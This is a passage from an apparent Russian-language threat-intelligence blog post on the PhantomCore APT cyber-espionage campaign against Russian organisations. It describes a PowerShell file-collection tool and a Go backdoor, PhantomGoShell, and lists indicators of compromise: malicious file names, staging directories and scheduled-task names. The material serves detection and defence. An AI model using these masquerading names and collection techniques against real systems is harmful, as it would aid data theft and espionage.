\u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0430 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0433\u043e PowerShell\u2011\u0441\u043a\u0440\u0438\u043f\u0442\u0430 (\u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0432\u00a0\u0440\u0430\u043c\u043a\u0430\u0445 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0435\u00a0\u0443\u0434\u0430\u043b\u043e\u0441\u044c).<\/p>\n<\/li>\n<li>\n<p>\u0421\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c PhantomTaskShell, \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0449\u0435\u0433\u043e \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043e\u0442\u00a0\u043f\u0430\u043d\u0435\u043b\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom, \u0437\u0430\u043f\u0443\u0441\u043a PowerShell\u2011\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u0441\u00a0\u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u043e\u0439 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u043e\u0439 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432 \u0438 \u043e\u043f\u0446\u0438\u044f\u043c\u0438 \u2011r (\u0440\u0435\u043a\u0443\u0440\u0441\u0438\u0432\u043d\u044b\u0439 \u043f\u043e\u0438\u0441\u043a) \u0438 \u2011e (\u0441\u043f\u0438\u0441\u043e\u043a \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0439 \u0444\u0430\u0439\u043b\u043e\u0432). \u0421\u0431\u043e\u0440 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432 Microsoft Office \u0438 \u0442\u0435\u043a\u0441\u0442\u043e\u0432\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u0439, LNK\u2011\u0444\u0430\u0439\u043b\u043e\u0432, \u0430\u00a0\u0442\u0430\u043a\u0436\u0435 \u0444\u0430\u0439\u043b\u043e\u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 RDP\u2011 \u0438 OpenVPN\u2011\u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0439.<\/p>\n<\/li>\n<li>\n<p>\u0423\u0434\u0430\u043b\u0435\u043d\u0438\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432.<\/p>\n<\/li>\n<\/ul>\n<p>\u0412\u043e\u0442 \u0442\u0430\u043a \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043c\u0438\u043c\u0438\u043a\u0440\u0438\u044f \u043f\u043e\u0434\u00a0\u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0432\u00a0\u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432:<\/p>\n<p><code> ssh.exe<br \/> hosts.exe<br \/> inetpub.exe<br \/> srvhost.exe\u00a0<\/code><\/p>\n<p>\u0410\u00a0\u044d\u0442\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u0438\u043c\u0435\u043d\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432:<\/p>\n<p><code>dnsclient.zip<br \/> dnsclient.bat<br \/> inetpub.zip<br \/> inetpub.exe<br \/> hosts.zip<br \/> hosts.exe<br \/> update.zip<br \/> update.ps1<br \/> remote.zip<br \/> remote.exe<br \/> remote.dll<br \/> load.zip<br \/> load.ps1<br \/> one.zip<br \/> one.exe<br \/> xenallpassword.exe<br \/> browser.zip<br \/> browser.exe<br \/> srvhost.exe<br \/> wusa.conf\u00a0<\/code><\/p>\n<p>\u0414\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0435 \u0434\u043b\u044f\u00a0\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432:<\/p>\n<p><code>C:\\ProgramData\\<\/code><br \/><code>C:\\ProgramData\\YandexCloud<\/code><br \/><code>C:\\ProgramData\\MicrosoftAppStore<\/code><br \/><code>C:\\Windows\\system32\\OpenSSH<\/code><\/p>\n<p><strong> <\/strong>\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u0437\u0430\u0434\u0430\u0447 \u0432\u00a0\u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0449\u0438\u043a\u0435 \u0437\u0430\u0434\u0430\u0447 Windows:<\/p>\n<p><code>Yandex Update<\/code><br \/><code>Microsoft Update<\/code><br \/><code>Update<\/code><br \/><code>SSH<\/code><br \/><code>DNS<\/code><\/p>\n<\/li>\n<\/ol>\n<p>\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0446\u0435\u043f\u043e\u0447\u043a\u0438 \u0430\u0442\u0430\u043a\u0438 \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c <a href=\"https:\/\/ptsecurity.com\/ru-ru\/research\/pt-esc-threat-intelligence\/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore\/\" rel=\"noopener noreferrer nofollow\">\u0432\u00a0\u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438 \u0432\u00a0\u0431\u043b\u043e\u0433\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b<\/a>.<\/p>\n<h2>\u041b\u0430\u043d\u0434\u0448\u0430\u0444\u0442 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a<\/h2>\n<p>\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438, \u043d\u0430\u00a0\u043c\u043e\u043c\u0435\u043d\u0442 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u00a0\u0440\u0430\u043c\u043a\u0430\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0435 PhantomCore \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a 181\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c\u0443 \u0445\u043e\u0441\u0442\u0443. \u041f\u0435\u0440\u0432\u043e\u0435 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0435 \u0434\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f 12\u00a0\u043c\u0430\u044f 2025\u00a0\u0433\u043e\u0434\u0430, \u043d\u0430\u0438\u0431\u043e\u043b\u044c\u0448\u0435\u0439 \u0438\u043d\u0442\u0435\u043d\u0441\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438 \u0434\u043e\u0441\u0442\u0438\u0433\u043b\u0438 \u0432\u00a0\u0438\u044e\u043d\u0435, \u043f\u0440\u0438\u00a0\u044d\u0442\u043e\u043c 56% \u0432\u0441\u0435\u0445 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0439 \u043f\u0440\u0438\u0448\u043b\u043e\u0441\u044c \u043d\u0430 30\u00a0\u0438\u044e\u043d\u044f. \u0421\u0440\u0435\u0434\u043d\u044f\u044f \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u043f\u0440\u0435\u0431\u044b\u0432\u0430\u043d\u0438\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 \u0432\u00a0\u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 24\u00a0\u0434\u043d\u044f, \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u0430\u044f\u00a0\u2014 78\u00a0\u0434\u043d\u0435\u0439. 49\u00a0\u0445\u043e\u0441\u0442\u043e\u0432 \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u043f\u043e\u0434\u00a0\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0435\u043c \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 \u0434\u043e\u00a0\u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b9e\/694\/7b4\/b9e6947b40914122cd04f907c83fdfb7.png\" alt=\"\u041a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0439 \u043f\u043e \u043c\u0435\u0441\u044f\u0446\u0430\u043c\" title=\"\u041a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0439 \u043f\u043e \u043c\u0435\u0441\u044f\u0446\u0430\u043c\" width=\"1800\" height=\"800\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/b9e\/694\/7b4\/b9e6947b40914122cd04f907c83fdfb7.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b9e\/694\/7b4\/b9e6947b40914122cd04f907c83fdfb7.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u041a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0439 \u043f\u043e\u00a0\u043c\u0435\u0441\u044f\u0446\u0430\u043c<\/figcaption><\/div>\n<\/figure>\n<p>TI\u2011\u0434\u0435\u043f\u0430\u0440\u0442\u0430\u043c\u0435\u043d\u0442\u0443 PT ESC \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438 \u0443\u0432\u0435\u0434\u043e\u043c\u0438\u0442\u044c \u043e\u00a0\u043a\u0438\u0431\u0435\u0440\u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0435 \u0434\u043e\u00a0\u043d\u0430\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u044f \u043d\u0435\u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u044b\u0445 \u0441\u043e\u0431\u044b\u0442\u0438\u0439 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438, \u0441\u0442\u0430\u0432\u0448\u0438\u0435\u00a0\u0436\u0435\u0440\u0442\u0432\u0430\u043c\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 PhantomeCore.<\/p>\n<h2>\u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0440\u0430\u0441\u043a\u043e\u043b\u043e\u043b\u0430\u0441\u044c (\u0438\u043b\u0438 \u043e\u0431\u0437\u0430\u0432\u0435\u043b\u0430\u0441\u044c \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u043c \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0438\u043c \u00ab\u0434\u0435\u0442\u0441\u0430\u0434\u043e\u043c\u00bb?)<\/h2>\n<p>\u0412\u00a0\u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u0430\u043f\u0440\u0435\u043b\u044f \u0442\u0435\u043a\u0443\u0449\u0435\u0433\u043e \u0433\u043e\u0434\u0430, \u0437\u0430\u00a0\u0434\u0432\u0435 \u043d\u0435\u0434\u0435\u043b\u0438 \u0434\u043e\u00a0\u043d\u0430\u0447\u0430\u043b\u0430 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u043c\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430, \u0433\u0440\u0443\u043f\u043f\u0430 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u0440\u0430\u043d\u0435\u0435 \u043d\u0435\u00a0\u0432\u0441\u0442\u0440\u0435\u0447\u0430\u0432\u0448\u0438\u0439\u0441\u044f \u0440\u0435\u0432\u0435\u0440\u0441\u2011\u0448\u0435\u043b\u043b, \u0438\u043c\u0435\u0432\u0448\u0438\u0439 \u0441\u0445\u043e\u0434\u0441\u0442\u0432\u043e \u0441\u00a0\u0438\u043d\u044b\u043c\u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438 \u0438\u0437\u00a0\u0430\u0440\u0441\u0435\u043d\u0430\u043b\u0430 APT\u2011\u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore 2024\u00a0\u0433\u043e\u0434\u0430.<\/p>\n<p>\u041d\u043e\u0432\u044b\u0439 \u0431\u044d\u043a\u0434\u043e\u0440, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0438\u0439 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 PhantomGoShell, \u043d\u0430\u043f\u0438\u0441\u0430\u043d \u043d\u0430\u00a0Go, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c Windows\u2011\u0445\u043e\u0441\u0442\u0435 \u0447\u0435\u0440\u0435\u0437 \u0438\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0430\u0442\u043e\u0440 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438, \u043d\u0430\u00a0\u0443\u0440\u043e\u0432\u043d\u0435 \u043b\u043e\u0433\u0438\u043a\u0438 \u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0438\u043c\u0435\u0435\u0442 \u0441\u0445\u043e\u0434\u0441\u0442\u0432\u0430 \u0441\u00a0PhantomRAT \u0438 PhantomRShell (\u0431\u043e\u043b\u0435\u0435 \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u043e\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0431\u044d\u043a\u0434\u043e\u0440\u0430\u00a0\u2014 <a href=\"https:\/\/ptsecurity.com\/ru-ru\/research\/pt-esc-threat-intelligence\/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore\/\" rel=\"noopener noreferrer nofollow\">\u0432\u00a0\u0431\u043b\u043e\u0433\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b<\/a>).<\/p>\n<p>\u041e\u0434\u043d\u0430\u043a\u043e \u0440\u044f\u0434 \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u043e\u0432 \u0432\u00a0\u0441\u043e\u0432\u043e\u043a\u0443\u043f\u043d\u043e\u0441\u0442\u0438 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u043b\u0438 \u043d\u0430\u00a0\u0442\u043e, \u0447\u0442\u043e\u00a0\u0437\u0430\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u0431\u044d\u043a\u0434\u043e\u0440\u0430 \u0441\u0442\u043e\u044f\u0442 \u043d\u0438\u0437\u043a\u043e\u043a\u0432\u0430\u043b\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0445\u0430\u043a\u0435\u0440\u044b, \u043d\u0435\u00a0\u0432\u0445\u043e\u0434\u044f\u0449\u0438\u0435 \u0432\u00a0\u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0435 \u0437\u0432\u0435\u043d\u043e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore, \u043d\u043e\u00a0\u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0438\u0435 \u0441\u044b\u0440\u043e\u0439 \u0442\u0435\u0441\u0442\u043e\u0432\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0438\u0437\u00a0\u0435\u0435 \u0430\u0440\u0441\u0435\u043d\u0430\u043b\u0430.<\/p>\n<p>\u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430\u00a0\u0447\u0430\u0441\u0442\u0438\u0447\u043d\u043e\u0435 \u0441\u0445\u043e\u0434\u0441\u0442\u0432\u043e PhantomGoShell \u0441\u00a0\u0431\u044d\u043a\u0434\u043e\u0440\u0430\u043c\u0438 PhantomRShell \u0438 PhantomRAT, \u043c\u044b \u043f\u043e\u043b\u0430\u0433\u0430\u0435\u043c, \u0447\u0442\u043e\u00a0\u0437\u0430\u00a0\u0440\u0430\u0437\u0432\u0438\u0442\u0438\u0435\u043c \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u044f\u0432\u043d\u043e \u0438\u043c\u0435\u044e\u0449\u0438\u0445 \u043e\u0431\u0449\u0443\u044e \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0431\u0430\u0437\u0443, \u0441\u0442\u043e\u044f\u0442 \u0440\u0430\u0437\u043d\u044b\u0435 \u0445\u0430\u043a\u0435\u0440\u044b.<\/p>\n<p>\u041e\u0442\u043b\u0438\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044f\u043c\u0438 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u0432 PhantomGoShell \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f:<\/p>\n<ul>\n<li>\n<p>\u0431\u043e\u043b\u0435\u0435 \u043f\u0440\u043e\u0441\u0442\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c;<\/p>\n<\/li>\n<li>\n<p>\u0438\u043d\u044b\u0435 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u0434\u043b\u044f\u00a0\u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f;<\/p>\n<\/li>\n<li>\n<p>\u0438\u043d\u044b\u0435 \u043a\u043b\u044e\u0447\u0438 \u0440\u0435\u0435\u0441\u0442\u0440\u0430 Windows \u0434\u043b\u044f\u00a0\u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f;<\/p>\n<\/li>\n<li>\n<p>\u0438\u043d\u043e\u0439 \u0444\u043e\u0440\u043c\u0430\u0442 JSON\u2011\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440;<\/p>\n<\/li>\n<li>\n<p>\u0438\u043d\u043e\u0439 \u0444\u043e\u0440\u043c\u0430\u0442 URL\u2011\u043c\u0430\u0440\u0448\u0440\u0443\u0442\u043e\u0432;<\/p>\n<\/li>\n<li>\n<p>\u0430\u0440\u0442\u0435\u0444\u0430\u043a\u0442\u044b \u0432\u00a0\u043a\u043e\u0434\u0435, \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0449\u0438\u0435 \u043d\u0430\u00a0\u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0443 \u0438 \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0431\u044d\u043a\u0434\u043e\u0440\u0430;<\/p>\n<\/li>\n<li>\n<p>\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 HTTP\u2011\u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043a\u043e\u0432 \u0434\u043b\u044f\u00a0\u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u043e\u0432;<\/p>\n<\/li>\n<li>\n<p>\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0435\u043c\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438. <\/p>\n<\/li>\n<\/ul>\n<p>\u041d\u0430\u00a0\u0443\u0440\u043e\u0432\u043d\u0435 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u044b PhantomGoShell \u0432\u044b\u0434\u0435\u043b\u044f\u044e\u0442\u0441\u044f \u0435\u0435 \u043c\u0430\u043b\u044b\u043c \u0440\u0430\u0437\u043c\u0435\u0440\u043e\u043c (1\u00a0\u0441\u0435\u0440\u0432\u0435\u0440) \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0438\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f\u00a0\u2014 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 Python WSGI \u00abWaitress\u00bb, \u043d\u0435\u00a0\u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u043d\u0430\u00a0C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 PhantomRShell \u0438 PhantomRAT.<\/p>\n<p>\u041f\u043e\u0432\u0435\u0434\u0435\u043d\u0447\u0435\u0441\u043a\u0438\u0435 \u043f\u0430\u0442\u0442\u0435\u0440\u043d\u044b \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u043e\u0432 PhantomGoShell, \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438 \u0438 \u043e\u0431\u0449\u0430\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0442\u0430\u043a\u0436\u0435 \u043e\u0442\u043b\u0438\u0447\u0430\u044e\u0442 \u0438\u0445 \u043e\u0442\u00a0\u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u043e\u0432 PhantomRShell \u0438 PhantomRAT:<\/p>\n<ul>\n<li>\n<p>\u0422\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 \u0432\u00a0\u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0445 \u043f\u0435\u0441\u043e\u0447\u043d\u0438\u0446\u0430\u0445 \u0441\u00a0\u0431\u0435\u0441\u043f\u043b\u0430\u0442\u043d\u044b\u0445 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u043e\u0432 \u0432\u00a0\u043d\u043e\u0447\u043d\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u0441\u0443\u0442\u043e\u043a.<\/p>\n<\/li>\n<li>\n<p>\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0437\u0430\u043d\u044f\u043b\u043e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u043d\u0435\u0439.<\/p>\n<\/li>\n<li>\n<p>\u041a\u043e\u0440\u043e\u0442\u043a\u0438\u0439 \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043e\u043a \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u043c\u0435\u0436\u0434\u0443 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435\u043c PhantomGoShell \u0438 \u043f\u0435\u0440\u0432\u044b\u0445 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a \u0441\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0431\u044d\u043a\u0434\u043e\u0440\u043e\u0432 PhantomRShell \u0438 PhantomRAT, \u044f\u0432\u043d\u043e \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u044b\u0439 \u0434\u043b\u044f\u00a0\u0440\u0435\u0444\u0430\u043a\u0442\u043e\u0440\u0438\u043d\u0433\u0430 \u0438 \u044d\u0432\u043e\u043b\u044e\u0446\u0438\u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432.<\/p>\n<\/li>\n<li>\n<p>\u041e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0444\u0430\u043a\u0442\u043e\u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f PhantomGoShell \u0432\u00a0\u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445\u00a0\u043b\u0438\u0431\u043e \u0432\u00a0\u0441\u043e\u0441\u0442\u0430\u0432\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u043d\u0430\u0431\u043e\u0440\u0430 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438. <\/p>\n<\/li>\n<\/ul>\n<p>\u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, \u0433\u0440\u0443\u043f\u043f\u0435 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c, \u0447\u0442\u043e\u00a0\u0437\u0430\u00a0\u043d\u0435\u043e\u0431\u044b\u0447\u043d\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c\u044e \u0441\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c PhantomGoShell \u0441\u0442\u043e\u044f\u0442 